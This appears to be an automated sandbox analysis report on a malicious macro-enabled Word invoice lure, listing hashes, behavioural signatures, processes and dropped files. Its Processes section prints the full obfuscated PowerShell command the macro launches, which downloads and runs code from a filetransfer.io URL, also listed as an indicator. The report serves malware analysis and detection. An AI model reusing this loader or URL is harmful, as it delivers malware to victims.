Analysis
-
max time kernel
46s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
12-08-2023 07:58
Behavioral task
behavioral1
Sample
INVOICE PACKAGE LINK TO DOWNLOAD.docm
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
INVOICE PACKAGE LINK TO DOWNLOAD.docm
Resource
win10v2004-20230703-en
General
-
Target
INVOICE PACKAGE LINK TO DOWNLOAD.docm
-
Size
16KB
-
MD5
f2d0c66b801244c059f636d08a474079
-
SHA1
c62129fff128817b5af62aa0051c082f9992112e
-
SHA256
08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873
-
SHA512
5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d
-
SSDEEP
384:/iMIoinwt9VRFPZ1AZy8WNxt/ZtNN6wyMDv6js2ZzoP6Yv:/7u651AQrxllN6wyMOAOUPPv
Malware Config
Extracted
https://filetransfer.io/data-package/UR2whuBv/download
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2220 2656 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 5 2220 powershell.exe 7 2220 powershell.exe 9 2220 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2656 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2220 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2656 WINWORD.EXE 2656 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 2656 wrote to memory of 2220 2656 WINWORD.EXE powershell.exe PID 2656 wrote to memory of 2220 2656 WINWORD.EXE powershell.exe PID 2656 wrote to memory of 2220 2656 WINWORD.EXE powershell.exe PID 2656 wrote to memory of 2220 2656 WINWORD.EXE powershell.exe PID 2656 wrote to memory of 2916 2656 WINWORD.EXE splwow64.exe PID 2656 wrote to memory of 2916 2656 WINWORD.EXE splwow64.exe PID 2656 wrote to memory of 2916 2656 WINWORD.EXE splwow64.exe PID 2656 wrote to memory of 2916 2656 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm"1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD52773119d5fff52b5a4e90f173b89e4e5
SHA18769c04067f360ae3fff05ad696473b9f8bb34e7
SHA256df29bbff3025843c60b681bc16f12e553c3e1320e84322bee02e6f1dbfd484d6
SHA512036a344b3a419814e41f836094d341d0040b437cfc476a506171894b2c468d6e2dd0377bea00f72fe2e7b30cb476006e9d95768941f89f0af093b16561992176
-
C:\Users\Admin\AppData\Local\Temp\CabAAB3.tmpFilesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
C:\Users\Admin\AppData\Local\Temp\TarAB52.tmpFilesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
memory/2220-66-0x000000006B210000-0x000000006B7BB000-memory.dmpFilesize
5.7MB
-
memory/2220-68-0x00000000027A0000-0x00000000027E0000-memory.dmpFilesize
256KB
-
memory/2220-67-0x000000006B210000-0x000000006B7BB000-memory.dmpFilesize
5.7MB
-
memory/2220-69-0x00000000027A0000-0x00000000027E0000-memory.dmpFilesize
256KB
-
memory/2220-70-0x00000000027A0000-0x00000000027E0000-memory.dmpFilesize
256KB
-
memory/2220-138-0x000000006B210000-0x000000006B7BB000-memory.dmpFilesize
5.7MB
-
memory/2656-54-0x000000002F1D0000-0x000000002F32D000-memory.dmpFilesize
1.4MB
-
memory/2656-75-0x000000002F1D0000-0x000000002F32D000-memory.dmpFilesize
1.4MB
-
memory/2656-61-0x0000000006090000-0x0000000006190000-memory.dmpFilesize
1024KB
-
memory/2656-56-0x00000000719FD000-0x0000000071A08000-memory.dmpFilesize
44KB
-
memory/2656-55-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2656-137-0x00000000719FD000-0x0000000071A08000-memory.dmpFilesize
44KB
-
memory/2656-139-0x0000000006090000-0x0000000006190000-memory.dmpFilesize
1024KB